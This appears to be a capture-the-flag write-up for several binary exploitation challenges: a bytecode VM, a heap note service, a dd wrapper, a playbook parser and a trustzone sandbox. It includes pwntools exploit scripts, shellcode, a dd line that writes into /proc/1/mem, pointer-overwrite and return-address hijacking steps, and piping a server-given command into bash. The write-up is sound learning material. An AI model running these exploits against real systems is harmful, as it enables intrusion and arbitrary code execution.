Basically, the VM struct has one PC register, one stack register, and four general-purpose registers. It has three pages (page1, page2, and page_dummy) which are used to store the bytecode; page3 is used to store the data.
func is the function pointer which would be called in getFlag:
char *getFlag()
{
  char *v0; // rbx

  v0 = getenv("FLAG");
  if ( !v0 )
    fwrite("[E] no $FLAG set! do you need to hack harder?\n", 1uLL, 0x2EuLL, stderr);
  return v0;
}
When I saw this function, I knew my job was to overwrite this function pointer.
For more detail on how these four pages work, let’s review getDesc and allocNewSegment. The getDesc function returns:
page1 + offset - 0x1000 if the offset is in the range [0x1000, 0x2000) (this is why the initial value of pc is 0x1000)
page2 + offset - 0x2000 if the offset is in the range [0x2000, 0x3000)
page_dummy + offset - 0x3000 if the offset is in the range [0x8000, 0x9000)
Otherwise, it returns bufs.data[offset-object_offset]
To figure out where these bufs objects come from, check allocNewSegment:
if offset < 0x1000, it tries to allocate a BufIO object that represents the VM’s data at the offset range [0xa000, 0xa000+0x200) on the first call, and [0xa000+0x200*n, 0xa000+0x200*(n+1)) on subsequent calls.
if offset >= 0x3000, it tries to allocate a BufIO object that represents the VM’s data at the offset range [0x3000, 0x3000+0x200) on the first call, and [0x3000+0x200*n, 0x3000+0x200*(n+1)) on subsequent calls.
That is why getDesc returns bufs.data[bufs.offset - offset] if the offset >= 0x3000.
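To make the segment arithmetic concrete, here is a minimal sketch of how the n-th 0x200-byte window maps to VM offsets. The helper names `segment_range` and `find_segment` are mine, not from the binary, and the sketch only models the ranges described above, not the real allocation logic.

```python
SEGMENT_SIZE = 0x200  # size of one BufIO window, as described above


def segment_range(base: int, n: int) -> tuple:
    """Return the half-open VM offset range [start, end) of the n-th segment."""
    start = base + SEGMENT_SIZE * n
    return start, start + SEGMENT_SIZE


def find_segment(base: int, offset: int) -> int:
    """Return the index n of the segment whose range would cover `offset`."""
    if offset < base:
        raise ValueError("offset lies below the segment base")
    return (offset - base) // SEGMENT_SIZE


if __name__ == "__main__":
    for n in range(3):
        lo, hi = segment_range(0x3000, n)
        print(f"segment {n}: [{hex(lo)}, {hex(hi)})")
```

For example, offset 0x33ff falls into segment 1 of the 0x3000-based region, because segment 0 ends at 0x3200.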
Check some “interesting” syscalls and find the bug
In the exec_regVM function, there are two syscalls for reading and writing a buffer, which should be useful for later exploitation.
And … I found something interesting. I control the value of n, and there is no check that n is within the bounds of regs, which means I can also change the value of bufs!
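The effect of the missing bounds check can be modelled in a few lines. This is only a sketch under assumptions: I assume 8-byte register slots and that bufs sits directly after the four registers in the struct; the real layout may have other fields in between, in which case only the index changes.

```python
import struct

NUM_REGS = 4                        # four general-purpose registers
REG_SIZE = 8                        # assumption: 64-bit register slots
BUFS_OFFSET = NUM_REGS * REG_SIZE   # assumption: bufs follows regs directly


def make_vm(bufs_ptr: int) -> bytearray:
    """Build a flat model of the struct: regs[4] followed by the bufs pointer."""
    vm = bytearray(BUFS_OFFSET + REG_SIZE)
    struct.pack_into("<Q", vm, BUFS_OFFSET, bufs_ptr)
    return vm


def set_reg_unchecked(vm: bytearray, n: int, value: int) -> None:
    """Mirror the bug: n is never compared against NUM_REGS."""
    struct.pack_into("<Q", vm, n * REG_SIZE, value)


def get_bufs(vm: bytearray) -> int:
    return struct.unpack_from("<Q", vm, BUFS_OFFSET)[0]


if __name__ == "__main__":
    vm = make_vm(0x1111)
    set_reg_unchecked(vm, 4, 0xDEADBEEF)  # "register 4" does not exist
    print(hex(get_bufs(vm)))
```

Writing to index 4 lands on the field after the last real register, which in this model is bufs.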
At this point, everything was clear. I just needed to call allocNewSegment to allocate a BufIO object and change its data to an address that is useful for leaking memory.
Following the xrefs to allocNewSegment, I found that syscall 6 of stackVM lets me call the function with any arguments I want:
def start():
    if args.LOCAL:
        p = e.process(["inp.masm"])
    elif args.GDB:
        p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
        data = open("inp.masm", "rb").read()
        p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
        p.send(data)
    return p
rip = 4096
def set_page3_bit(page3, rip, should_be_set):
    # Apply same logic as in C:
    v2 = rip - 4089
    if rip >= 4096:
        v2 = rip - 4096
    index = v2 >> 3
    bit = rip & 7
    if not (0 <= index < len(page3)):
        print(f"Warning: v2 >> 3 = {index} out of bounds")
        return
    if should_be_set:
        page3[index] |= (1 << bit)
    else:
        page3[index] &= ~(1 << bit)
write_note doesn’t check whether offset is larger than the note’s size:
void write_note(int index, int offset, const char *buffer, int size) {
    if (index < 0 || index >= note_size) {
        printf("Index out of range\n");
        return;
    }
    if (notes[index] == NULL) {
        printf("Create note first\n");
        return;
    }
    if (offset < 0) {
        printf("Offset cannot be less than 0\n");
        return;
    }
    memcpy(notes[index] + offset, buffer, size); // bug
}
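A small model of the bug, assuming a flat bytearray stands in for the heap and a note of 0x20 bytes (both are illustrative choices, not values from the challenge). The `write_note_checked` variant shows the bounds check that the C code is missing.

```python
class NoteHeap:
    """Toy heap: one flat bytearray, notes are just base offsets into it."""

    def __init__(self, size: int):
        self.mem = bytearray(size)

    def write_note(self, base: int, offset: int, data: bytes) -> None:
        # Same checks as the C code: only a negative offset is rejected.
        if offset < 0:
            raise ValueError("Offset cannot be less than 0")
        start = base + offset
        self.mem[start:start + len(data)] = data

    def write_note_checked(self, base: int, note_size: int,
                           offset: int, data: bytes) -> None:
        # What a fixed version would do: keep the write inside the note.
        if offset < 0 or offset + len(data) > note_size:
            raise ValueError("write would leave the note")
        self.write_note(base, offset, data)


if __name__ == "__main__":
    heap = NoteHeap(0x80)
    heap.write_note(0, 0x60, b"\xb8\x02")   # far past a 0x20-byte note
    print(heap.mem[0x60:0x62].hex())
```

With the unchecked version, a write at offset 0x60 reaches whatever lives 0x60 bytes after the note, which is what the exploit below relies on.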
Exploit
To make debugging easier, I did not set GLIBC_TUNABLES='glibc.mem.tagging=1'.
Writing to notes[0] at offset 0x60 actually changes the value of notes[0] itself.
Write \xb8\x02 to make notes[0] point to the flag function pointer.
After that, read notes[0] to leak the flag function address.
Write to notes[0] at offset 0x18 to change the exit function pointer; we want it to become flag.
Change notes[0] to an invalid address -> read note -> segfault -> call flag
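The two-byte write in the second step is a partial pointer overwrite: only the low bytes of the little-endian pointer change, so the upper bytes keep their value. A minimal sketch, where the starting address is made up for illustration:

```python
import struct


def partial_overwrite(pointer: int, low_bytes: bytes) -> int:
    """Replace the lowest len(low_bytes) bytes of a 64-bit little-endian pointer."""
    if len(low_bytes) > 8:
        raise ValueError("a 64-bit pointer has only 8 bytes")
    raw = bytearray(struct.pack("<Q", pointer))
    raw[:len(low_bytes)] = low_bytes
    return struct.unpack("<Q", bytes(raw))[0]


if __name__ == "__main__":
    old = 0x0000555555559010          # hypothetical value of notes[0]
    new = partial_overwrite(old, b"\xb8\x02")
    print(hex(old), "->", hex(new))
```

This only works when the target shares the upper bytes with the original pointer, which is why two bytes are enough here.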
This seems quite easy, but what if GLIBC_TUNABLES='glibc.mem.tagging=1' is set?
The offset is random now, but only in the highest byte.
def main():
    print('Do you like dd? It is my favorite old-style tool :D\n')
    line = input(' > What is your favorite dd line?: ').encode()
    user_input = input(' > Any input to go with it?: ').encode()
    print('I like it! Let\'s give it a go!')
    res = subprocess.run(['dd'] + line.split(), input=user_input, capture_output=True)
    print(res.stdout.decode('utf-8'))
    print(res.stderr.decode('utf-8'))
    print('It was fun, bye!')

if __name__ == '__main__':
    main()
With dd, we can read or write any file, anywhere we want. But the flag file has a random name.
Somehow, the python executable in the container is a static binary.
The author did not mention this in the challenge’s description. From this point on, I would call it a guessy challenge.
Since the addresses do not change, we can use the /proc/.../mem trick.
From the config files, I guessed that the pid of the python process should be 1:
Since keep_caps is true, we should be able to write to /proc/1/mem.
Now, what do I write, and where?
Since line and user_input use Python’s default encoding, which is UTF-8, I could not write arbitrary bytes; each byte must not be greater than 0x7f.
I found that when pymain_main is about to return, rdi=0, rsi=rsp-0x208, and rdx is big enough. So I just wrote syscall ; ret at the end of the function.
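A quick check of what the encoding does to this payload. The sketch assumes the server reads stdin as UTF-8 and models `input().encode()` as a decode followed by an encode; the helper names are mine. Note that ret is 0xc3, which is above 0x7f, but it happens to be a valid lead byte of a two-byte UTF-8 sequence.

```python
SYSCALL_RET = b"\x0f\x05\xc3"  # x86-64 encoding of: syscall ; ret


def bytes_on_the_wire(raw: bytes) -> bytes:
    """What the exploit sends: latin-1 decode, then UTF-8 encode."""
    return raw.decode("latin-1").encode("utf-8")


def server_round_trip(wire: bytes) -> bytes:
    """Model of input().encode() on the server (assumes UTF-8 stdin)."""
    return wire.decode("utf-8").encode("utf-8")


if __name__ == "__main__":
    wire = bytes_on_the_wire(SYSCALL_RET)
    print(wire.hex())                      # bytes that dd receives
    print(server_round_trip(wire) == wire)
    try:
        SYSCALL_RET.decode("utf-8")        # the raw payload is not valid UTF-8
    except UnicodeDecodeError as err:
        print("raw payload rejected:", err.reason)
```

So the bytes that reach dd are the three payload bytes plus one trailing 0x83, which lands after the ret.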
I would say I was lucky to find this way to deal with this guessy challenge.
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.arch = 'amd64'
shellcode = asm("""
    syscall
    ret
""")
escaped = ''.join(f'\\x{b:02x}' for b in shellcode)

host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))

if host_port[0] != "localhost":
    p.recvuntil(b'You can run the solver with:\n')
    cmd = p.recvline().decode()
    log.info(cmd)
    ans = popen(f"bash -c '{cmd}'").read()
    p.sendlineafter(b'Solution? ', ans.encode())

pause()

p.sendlineafter(b' > What is your favorite dd line?: ',
                b'if=/proc/self/fd/0 of=/proc/1/mem bs=1 seek=' + str(0x6BC71E).encode())
p.sendlineafter(b'Any input to go with it?:', shellcode.decode('latin-1').encode())
int idx[11]; // [rsp+1004h] [rbp-4Ch] BYREF
int *p_idx; // [rsp+1030h] [rbp-20h] MAPDST
int nest; // [rsp+1038h] [rbp-18h]

p_idx = idx;
nest = 1;
len = 251;
puts("Enter new playbook in the SOPS language. Empty line finishes the entry.");
idx[0] = allocate_playbook();
while ( fgets(inpbuf, len, stdin) && inpbuf[0] != 10 )
{
  memset(buf, 0, sizeof(buf));
  _isoc99_sscanf(inpbuf, "%s", buf);
  ...
  {
    if ( !strcmp(buf, "ENDSTEP") )
    {
      --p_idx;
      if ( --nesting_depth < 0 )
      {
        puts("Mismatched STEP and ENDSTEP.");
        exit(1);
      }
    }
We can decrement p_idx twice before running STEP; when p_idx is incremented again, it points to len, which means len becomes equal to the return value of allocate_playbook:
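The pointer walk can be modelled as an index into a list of stack slots. This is a sketch under several assumptions that the decompiled snippet does not confirm: len is stored in the int slot directly below idx[0], STEP increments p_idx and stores the new playbook id through it, and the nesting-depth check is not modelled at all.

```python
def simulate(commands, playbook_id: int, initial_len: int = 251) -> int:
    """Return the final value of len after running the given commands.

    Slot 0 models len; slots 1..11 model idx[0..10] (assumed layout).
    """
    stack = [initial_len] + [0] * 11
    p_idx = 1                                # p_idx = &idx[0]
    for cmd in commands:
        if cmd == "ENDSTEP":
            p_idx -= 1                       # --p_idx, no lower bound check
        elif cmd == "STEP":
            p_idx += 1                       # assumed: ++p_idx, then store
            if 0 <= p_idx < len(stack):      # ignore writes outside the model
                stack[p_idx] = playbook_id
    return stack[0]


if __name__ == "__main__":
    print(simulate(["ENDSTEP", "ENDSTEP", "STEP"], playbook_id=500))
```

In this model, two ENDSTEPs move the pointer to idx[-2], and the following STEP lands on idx[-1], the slot that holds len, so the size passed to fgets becomes the playbook id.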
#!/usr/bin/env python
from pwn import *
from os import popen
from time import sleep

context.binary = e = ELF("chal")

gs = """
set follow-fork-mode parent
# b *0x4021C5
# b *0x402605
# b new_playbook
# b *0x401E69
b *0x4025B7
"""

def start():
    if args.LOCAL:
        p = e.process()

    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    return p
def add(list_data: list[bytes]):
    p.sendline(b"2")
    p.recvuntil(
        b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
    for data in list_data:
        # if len(data) == 251 or b'\n' in data:
        #     p.send(data)
        # else:
        p.sendline(data)

# for i in range(1, 0x50):
#     add([b"note: " + b'A' * 0x30, b'STEP',
#          b"note: " + b'B' * 0x30, b'ENDSTEP', b'\n'])
#     remove(i + 1)

# add([b"note: " + b'A' * 0x30, b'\n'])
# execute(1)
# for i in range(0x4f):
#     p.recvuntil(b'Note: ')
#     if i == 0xa:
#         p.sendline(p8(i))
#     else:
#         p.send(p8(i)*251)

# sleep(1)
for i in range(1, 512+30):
    if i < 3:
        add([b"note: " + b'A' * 0x30, b'STEP', b'\n'])
    else:
        add([b"note: " + b'sh', b'\n'])
    log.info(str(i))

if args.GDB:
    gdb.attach(p, gdbscript=gs)
    pause()

# p.sendline(b'#'*249)
# p.sendline(b"2")
# p.recvuntil(
#     b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
# p.send(b'note: ')
# for i in range(250-7):
#     p.send(b' ')
The document only describes how these three trustzones work, not the code:
There are currently three example trustzones you can load:
Name: create_map_shared_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length
Return Value: rbx = shared memory handle, or error code from create_shared if a buffer could not be created
Description: This trustzone will create and map a shared memory buffer of the desired length into the current process at the specified address.

Name: map_shared_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = shared memory handle, rcx = addr, rdx = length
Return Value: rbx = 0xffff on validate_handle failure, or the return value from the map_address syscall
Description: This trustzone maps a shared memory buffer specified by the handle into the current process at the specified address.

Name: memprot_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length, rdx = prot, rdi = password
Return Value: rbx = 0xffff on password authentication failure, or the return value from the memprot syscall
Description: This trustzone sets the memory protection on a range of memory. Please note that rdi must be a pointer to a string containing the password.
So I wrote map_shared_x86_64 and memprot_x86_64 based on what the document says (I don’t need create_map_shared_x86_64, since create_shared is not a trusted syscall):
Since only a trustzone’s bytecode can call trusted syscalls, being able to write this bytecode is promising for later exploitation.
Leak password
Reading the source code of confirm_password, I could be sure that the password file is in the same directory as the chal file:
int password_fd = open("password",O_RDONLY);
I could take advantage of create_trustzone to read the password and map it to any address, since the function can open any file in the same directory:
for(unsigned i = 0; i < sizeof(filename); i++) {
    if(filename[i] == '.' || filename[i] == '/') {
        filename[i] = '_';
    }
}
int fd = open(filename,O_RDONLY);
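A Python equivalent of that filter shows why the name password survives it: the loop only rewrites dots and slashes, so path traversal is blocked but any plain file name in the working directory passes through unchanged. The function name `sanitize` is mine.

```python
def sanitize(filename: str) -> str:
    """Replace every '.' and '/' with '_', like the loop in create_trustzone."""
    return "".join("_" if ch in "./" else ch for ch in filename)


if __name__ == "__main__":
    for name in ("password", "../etc/passwd", "map_shared_x86_64"):
        print(f"{name!r} -> {sanitize(name)!r}")
```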
But safe_read checks whether the address overlaps with the trustzone, so it was not easy to read the password:
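I do not reproduce safe_read here; the following is only a generic sketch of what a check for overlap between two half-open ranges looks like, with made-up addresses. The real function may compare different bounds.

```python
def ranges_overlap(a_start: int, a_len: int, b_start: int, b_len: int) -> bool:
    """True if [a_start, a_start+a_len) and [b_start, b_start+b_len) intersect."""
    return a_start < b_start + b_len and b_start < a_start + a_len


if __name__ == "__main__":
    TZ_START, TZ_LEN = 0x10000, 0x1000      # hypothetical trustzone mapping
    print(ranges_overlap(0x10800, 0x100, TZ_START, TZ_LEN))  # inside the zone
    print(ranges_overlap(0x11000, 0x100, TZ_START, TZ_LEN))  # right after it
```

A read that ends exactly where the protected range begins, or starts exactly where it ends, does not overlap under this definition.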
I chose to allocate a buffer of size 0xf000. I expected this buffer to sit at a fixed offset from the TLS address, which I could use to leak the addresses of other segments:
Although it was not at a fixed offset from TLS as I expected, I could still leak the heap address and the JIT (RWX) address:
After leaking the addresses, I created a new process that overwrote its trustzone with:
mov eax, 5
int3
This shellcode lets me call map_address directly, to read or write any host address I want.
Where to write the shellcode?
Up to this point, I had leaked the heap address and an RWX address.
At first, I tried to overwrite the code of thread 2 with shellcode that spawns a shell:
But on the remote, the leaked RWX address is not at a fixed offset from the RIP of the second thread.
So I tried to leak the stack address of the second thread.
Because the shellcode and the execution are the same, I assumed the call stack of the remote process and the local one would be the same. Overwriting the second thread’s return address might be a good way.
I found that the second thread’s stack address could be leaked via a pointer at heap+0x5b00.
After overwriting its return address, the final step is to make it return.
I saw that it checks whether a local variable ($rbp-0x10) is negative.
Up to this point, the variable is always equal to 0, so the thread never leaves the loop (I think this is because my first shellcode ends with jmp $).
So I changed the variable to -1 (it lives in the heap segment, and I had leaked the heap address before).
The second thread then returns and executes our shellcode.
Final script
This is so f*cking long. I suggest you debug it yourself first.
p.send(data1)
p.sendafter(b"CODE_START\n", code1)
p.recvuntil(b'new process created with pid 0\n')
p.recvuntil(b'0\n')
buf0 = int(p.recvline().decode())
log.info(hex(buf0))